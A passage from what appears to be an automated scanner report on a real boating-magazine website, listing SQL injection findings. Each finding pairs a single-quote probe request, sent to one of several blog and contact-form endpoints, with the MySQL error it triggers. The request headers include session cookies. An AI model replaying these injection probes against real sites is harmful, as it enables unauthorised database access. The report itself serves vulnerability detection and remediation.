Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /career-opportunities?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.23. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.24. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/bay-tripper?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/bay-tripper?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.25. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/books?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/books?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.26. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/new-england-fishing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/new-england-fishing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.27. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /columns-blogs/under-way?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /columns-blogs/under-way?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.28. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component'/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component''/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.29. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact'/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact''/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.30. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The chronoformname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the chronoformname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /component/chronocontact/?chronoformname=PSPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:52:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/chronocontact/?chronoformname=PSPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /component/chronocontact/?chronoformname=PSPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:52:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
